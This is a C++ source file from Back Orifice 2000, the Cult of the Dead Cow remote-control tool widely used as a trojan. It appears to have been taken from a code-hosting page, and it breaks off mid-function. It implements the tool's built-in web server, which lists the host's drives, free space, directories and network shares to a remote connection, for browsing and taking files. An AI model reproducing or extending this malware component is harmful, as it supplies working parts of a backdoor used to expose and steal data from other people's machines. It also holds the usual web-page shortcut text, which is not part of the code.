📄 cmd_tcpip_http.cpp
字号:
/* Back Orifice 2000 - Remote Administration Suite
Copyright (C) 1999, Cult Of The Dead Cow
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
The author of this program may be contacted at dildog@l0pht.com. */
#include<windows.h>
#include<auth.h>
#include<osversion.h>
#include<iohandler.h>
#include<functions.h>
#include<cmd\cmd_tcpip.h>
#include<pviewer.h>
#include<strhandle.h>
//typedef struct __port_child_param {
// SOCKET s;
// SOCKADDR_IN saddr;
// BOOL *pbDone;
// int nArg1;
// char *svArg2;
// char *svArg3;
//} PORT_CHILD_PARAM;
#pragma pack(push,1)
typedef struct {
DWORD LowPart;
DWORD HighPart;
} ULARGE_INT;
#pragma pack(pop)
static char *typehtml = "text/html";
static char *typetext = "text/plain";
static char *typebinary = "application/octet-stream";
static char *typejpeg = "image/jpeg";
static char *typegif = "image/gif";
static char *dataerror = "Missing data";
typedef enum {
FOLDER,
FILE,
EXE,
IMAGE,
HTML,
TEXT,
COMPUTER,
DRIVE,
CDROM,
REMOTE,
ENTIRENETWORK,
NETWORK,
DOMAIN,
SERVER,
PRINTER
} GIFICON;
char *GetMimeType(char *filename)
{
char *ptr;
ptr=strrchr(filename, '.');
if(ptr==NULL) return typebinary;
ptr++;
if(lstrcmpi(ptr,"gif")==0) return typegif;
if(lstrcmpi(ptr,"jpg")==0 || lstrcmpi(ptr,"jpeg")==0) return typejpeg;
if(lstrcmpi(ptr,"htm")==0 || lstrcmpi(ptr,"html")==0) return typehtml;
if(lstrcmpi(ptr,"c")==0 || lstrcmpi(ptr,"cpp")==0 || lstrcmpi(ptr,"txt")==0 ||
lstrcmpi(ptr,"diz")==0 || lstrcmpi(ptr,"h")==0 || lstrcmpi(ptr,"bat")==0
|| lstrcmpi(ptr,"ini")==0 || lstrcmpi(ptr,"reg")==0) return typetext;
return typebinary;
}
GIFICON GetFileIcon(char *filename)
{
char *ptr;
ptr=strrchr(filename, '.');
if(ptr==NULL) return FILE;
ptr++;
if(lstrcmpi(ptr,"gif")==0 ||
lstrcmpi(ptr,"jpg")==0 || lstrcmpi(ptr,"jpeg")==0 ||
lstrcmpi(ptr,"bmp")==0) return IMAGE;
if(lstrcmpi(ptr,"exe")==0 || lstrcmpi(ptr,"com")==0 ||
lstrcmpi(ptr,"sys")==0 || lstrcmpi(ptr,"vxd")==0 ||
lstrcmpi(ptr,"dll")==0 || lstrcmpi(ptr,"cpl")==0) return EXE;
if(lstrcmpi(ptr,"htm")==0 || lstrcmpi(ptr,"html")==0) return HTML;
if(lstrcmpi(ptr,"c")==0 || lstrcmpi(ptr,"cpp")==0 || lstrcmpi(ptr,"txt")==0 ||
lstrcmpi(ptr,"diz")==0 || lstrcmpi(ptr,"h")==0 || lstrcmpi(ptr,"bat")==0
|| lstrcmpi(ptr,"ini")==0 || lstrcmpi(ptr,"reg")==0) return TEXT;
return FILE;
}
void FormatTime(char *buff, SYSTEMTIME thetime)
{
char *weekday, *month;
switch (thetime.wDayOfWeek) {
case 0: weekday = "Sun"; break;
case 1: weekday = "Mon"; break;
case 2: weekday = "Tue"; break;
case 3: weekday = "Wed"; break;
case 4: weekday = "Thu"; break;
case 5: weekday = "Fri"; break;
case 6: weekday = "Sat"; break;
default: weekday = "???"; break;
}
switch (thetime.wMonth)
{
case 1: month = "Jan"; break;
case 2: month = "Feb"; break;
case 3: month = "Mar"; break;
case 4: month = "Apr"; break;
case 5: month = "May"; break;
case 6: month = "Jun"; break;
case 7: month = "Jul"; break;
case 8: month = "Aug"; break;
case 9: month = "Sep"; break;
case 10: month = "Oct"; break;
case 11: month = "Nov"; break;
case 12: month = "Dec"; break;
default: month = "???"; break;
}
wsprintf(buff, "%s, %02d %s %d %02d:%02d:%02d GMT", weekday, thetime.wDay, month, thetime.wYear, thetime.wHour, thetime.wMinute, thetime.wSecond);
}
void FormatHttpHeader(char *buff, int val, char *contenttype, char *svOther)
{
char date[256];
char *errtxt;
SYSTEMTIME curtime;
switch (val) {
case 200: errtxt = "OK"; break;
case 201: errtxt = "Created"; break;
case 202: errtxt = "Accepted"; break;
case 204: errtxt = "No Content"; break;
case 300: errtxt = "Multiple Choices"; break;
case 301: errtxt = "Moved Permanently"; break;
case 302: errtxt = "Moved Temporarily"; break;
case 304: errtxt = "Not modified"; break;
case 400: errtxt = "Bad Request"; break;
case 401: errtxt = "Unauthorized"; break;
case 403: errtxt = "Forbidden"; break;
case 404: errtxt = "Not Found"; break;
case 500: errtxt = "Internal Server Error"; break;
case 501: errtxt = "Not Implemented"; break;
case 502: errtxt = "Bad Gateway"; break;
case 503: errtxt = "Service Unavailable"; break;
default: errtxt = ""; break;
}
GetSystemTime(&curtime);
FormatTime(date, curtime);
wsprintf(buff, "HTTP/1.1 %d %s\r\nServer: BO2K/0.9\r\nDate: %s\r\nContent-type: %s\r\nPublic: GET, POST\r\n%s\r\n", val, errtxt, date, contenttype,svOther);
}
void HTTPEnumRes(SOCKET s, NETRESOURCE *pNetContainer, DWORD dwScope)
{
char svBuffer[2048];
int i;
// Open network resource list
HANDLE hNet;
if (pWNetOpenEnum(dwScope,RESOURCETYPE_ANY,0,pNetContainer,&hNet)!=NO_ERROR) return;
// Enumerate resources
int ret;
DWORD dwCount,dwBufSize;
NETRESOURCE *pNetRes;
pNetRes=(NETRESOURCE *)malloc(16384);
if(pNetRes==NULL) {
pWNetCloseEnum(hNet);
return;
}
dwCount=1;
dwBufSize=16384;
ret=pWNetEnumResource(hNet,&dwCount,pNetRes,&dwBufSize);
while(ret!=ERROR_NO_MORE_ITEMS) {
// Give up time
Sleep(20);
char *svType,*svLocalName,*svRemoteName,*svComment;
GIFICON icon;
char svURLHead[MAX_PATH+1];
char svURLFoot[MAX_PATH+1];
svURLHead[0]='\0';
svURLFoot[0]='\0';
switch(pNetRes->dwDisplayType) {
case RESOURCEDISPLAYTYPE_DOMAIN:
icon=DOMAIN;
break;
case RESOURCEDISPLAYTYPE_GENERIC:
icon=SERVER;
break;
case RESOURCEDISPLAYTYPE_SERVER:
icon=SERVER;
break;
case RESOURCEDISPLAYTYPE_SHARE:
switch(pNetRes->dwType) {
case RESOURCETYPE_DISK:
wsprintf(svURLHead,"<a href=\"%s/\">",pNetRes->lpRemoteName+2);
for(i=lstrlen(svURLHead)-1;i>=0;i--)
if(svURLHead[i]=='\\') svURLHead[i]='/';
wsprintf(svURLFoot,"</a>");
icon=FOLDER;
break;
case RESOURCETYPE_PRINT:
icon=PRINTER;
break;
default:
svType="";
break;
}
break;
default:
icon=NETWORK;
break;
}
if(pNetRes->lpLocalName==NULL) svLocalName="";
else svLocalName=pNetRes->lpLocalName;
if(pNetRes->lpRemoteName==NULL) svRemoteName="";
else svRemoteName=pNetRes->lpRemoteName;
if(pNetRes->lpComment==NULL) svComment="";
else svComment=pNetRes->lpComment;
if(!pNetRes->lpLocalName && !pNetRes->lpRemoteName) {
wsprintf(svBuffer,"<img src=\"/?image=%u\"> %s<br>\r\n", icon, svComment);
} else {
wsprintf(svBuffer,"<img src=\"/?image=%u\"> %s%s%s <b>%s</b> <i>%s</i><br>\r\n", icon, svURLHead,svRemoteName, svURLFoot, svLocalName, svComment);
}
send(s,svBuffer,lstrlen(svBuffer),0);
// Recurse if necessary
if (pNetRes->dwUsage & RESOURCEUSAGE_CONTAINER && dwScope == RESOURCE_GLOBALNET) {
wsprintf(svBuffer,"<ul>");
send(s,svBuffer,lstrlen(svBuffer),0);
HTTPEnumRes(s,pNetRes,dwScope);
wsprintf(svBuffer,"</ul>");
send(s,svBuffer,lstrlen(svBuffer),0);
}
dwCount=1;
dwBufSize=16384;
ret=pWNetEnumResource(hNet,&dwCount,pNetRes,&dwBufSize);
}
free(pNetRes);
pWNetCloseEnum(hNet);
}
void HTTPHandleFile(SOCKET s, char *svReqType, char *svFullPath, char *svKnownPath, int nHTTPVersion)
{
char svBuffer[1024];
int i,j;
if(lstrcmp(svFullPath,"\\")==0) {
// Display computer name
DWORD dwBufSize = MAX_COMPUTERNAME_LENGTH+1;
char svComputerName[MAX_COMPUTERNAME_LENGTH+1];
if(GetComputerName(svComputerName, &dwBufSize)==FALSE) {
return;
}
// Issue headers and start of html
FormatHttpHeader(svBuffer,200,typehtml,"");
send(s,svBuffer,lstrlen(svBuffer),0);
// Put computer name header
GIFICON icon;
icon=COMPUTER;
wsprintf(svBuffer,"<html>\r\n<head><title>%s</title></head>\r\n<body bgcolor=#FFFFFF text=#000000>\r\n"
"<h1><img align=absbottom src=/?image=%u> %s</h1>\r\n<ul><pre>\r\n",
svComputerName, icon, svComputerName);
send(s,svBuffer,lstrlen(svBuffer),0);
// List all drives
char c;
int x;
for (c = 'C'; c <= 'Z'; c++) {
char *svDesc;
char svDesc2[512];
wsprintf(svBuffer,"%c:\\",c);
x = GetDriveType(svBuffer);
switch (x) {
case 0:
icon=DRIVE;
svDesc="Unable to determine";
break;
case 1:
break;
case DRIVE_REMOVABLE:
icon=DRIVE;
svDesc="Removable";
break;
case DRIVE_FIXED:
icon=DRIVE;
DWORD spc,bps,nfc,tnc,dwFree,dwTotal;
if (GetDiskFreeSpace(svBuffer,&spc,&bps,&nfc,&tnc)) {
dwFree=(nfc*((bps*spc)/1024));
dwTotal=(tnc*((bps*spc)/1024));
char fc,tc;
tc='K';
if(dwTotal>1024) {
dwTotal>>=10;
tc='M';
}
fc='K';
if(dwFree>1024) {
dwFree>>=10;
fc='M';
}
wsprintf(svDesc2, "Fixed Bytes free: %u%c/%u%c", dwFree, fc, dwTotal, tc);
svDesc=svDesc2;
} else svDesc="Fixed";
break;
case DRIVE_REMOTE:
icon=REMOTE;
svDesc="Remote";
break;
case DRIVE_CDROM:
icon=CDROM;
svDesc="CDROM";
break;
case DRIVE_RAMDISK:
icon=DRIVE;
svDesc="Ramdisk";
break;
default:
icon=DRIVE;
svDesc="Unknown";
break;
}
if(x!=1) {
wsprintf(svBuffer,"<img align=absbottom src=/?image=%u><a href=/%%DRIVE%%%c:/>%c:\\</a> %s\r\n",
icon,c,c,svDesc);
send(s,svBuffer,lstrlen(svBuffer),0);
}
}
// Issue Link to Network Neighborhood
wsprintf(svBuffer,"\r\n<h2><a href=\"/%%NETHOOD%%/\">Network Neighborhood</a></h2>\r\n");
send(s,svBuffer,lstrlen(svBuffer),0);
// Issue HTML footers
wsprintf(svBuffer,"</pre></ul>\r\n</body>\r\n</html>\r\n");
send(s,svBuffer,lstrlen(svBuffer),0);
}
else if(lstrcmp(svFullPath,"\\\\")==0) {
// Issue headers and start of html
FormatHttpHeader(svBuffer,200,typehtml,"");
send(s,svBuffer,lstrlen(svBuffer),0);
// Put title
wsprintf(svBuffer,"<html>\r\n<head><title>Network Neighborhood</title></head>\r\n<body bgcolor=#FFFFFF text=#000000>\r\n"
"<h1><img src=\"/?image=%u\"> Entire Network</h1>\r\n<ul>\r\n",(GIFICON)ENTIRENETWORK);
send(s,svBuffer,lstrlen(svBuffer),0);
HTTPEnumRes(s,NULL,RESOURCE_GLOBALNET);
// Issue HTML footers
wsprintf(svBuffer,"</ul>\r\n</body>\r\n</html>\r\n");
send(s,svBuffer,lstrlen(svBuffer),0);
} else {
DWORD dwFileAttr;
dwFileAttr=GetFileAttributes(svFullPath);
if(dwFileAttr==-1) dwFileAttr=FILE_ATTRIBUTE_DIRECTORY;
if(dwFileAttr & FILE_ATTRIBUTE_DIRECTORY) {
// Handle directory listing
WIN32_FIND_DATA w32fd;
char svWildCard[MAX_PATH+2];
lstrcpyn(svWildCard,svFullPath,MAX_PATH);
lstrcat(svWildCard,"*");
// Get file listing
HANDLE fh;
int nFileCount=0;
fh=FindFirstFile(svWildCard,&w32fd);
if(fh==INVALID_HANDLE_VALUE) return;
do {
nFileCount++;
} while(FindNextFile(fh,&w32fd));
FindClose(fh);
WIN32_FIND_DATA *pFileArray=(WIN32_FIND_DATA *)malloc(sizeof(WIN32_FIND_DATA)*nFileCount);
if(pFileArray==NULL) return;
fh=FindFirstFile(svWildCard,pFileArray);
if(fh==INVALID_HANDLE_VALUE) return;
for(i=1;i<nFileCount;i++) {
FindNextFile(fh,pFileArray+i);
}
FindClose(fh);
// Sort file listing
WIN32_FIND_DATA tmp;
for(i=0;i<nFileCount;i++) {
for(j=i+1;j<nFileCount;j++) {
if(pFileArray[i].dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
if(pFileArray[j].dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
if(lstrcmpi(pFileArray[i].cFileName,pFileArray[j].cFileName)>0) {
tmp=pFileArray[i]; pFileArray[i]=pFileArray[j]; pFileArray[j]=tmp;
}
}
} else {
if(pFileArray[j].dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
tmp=pFileArray[i]; pFileArray[i]=pFileArray[j]; pFileArray[j]=tmp;
} else {
if(lstrcmpi(pFileArray[i].cFileName,pFileArray[j].cFileName)>0) {
tmp=pFileArray[i]; pFileArray[i]=pFileArray[j]; pFileArray[j]=tmp;
}
}
}
}
}
// Issue headers and start of html
FormatHttpHeader(svBuffer,200,typehtml,"");
send(s,svBuffer,lstrlen(svBuffer),0);
wsprintf(svBuffer,"<html>\r\n<head><title>%s</title></head>\r\n<body bgcolor=#FFFFFF text=#000000>\r\n"
"<h1>Directory: %s</h1>\r\n<ul><pre>\r\n",svKnownPath,svKnownPath);
send(s,svBuffer,lstrlen(svBuffer),0);
// Output table header
wsprintf(svBuffer,"<b><u> Date Time Size Filename </u></b>\r\n");
send(s,svBuffer,lstrlen(svBuffer),0);
DWORD dwBytesTotal;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -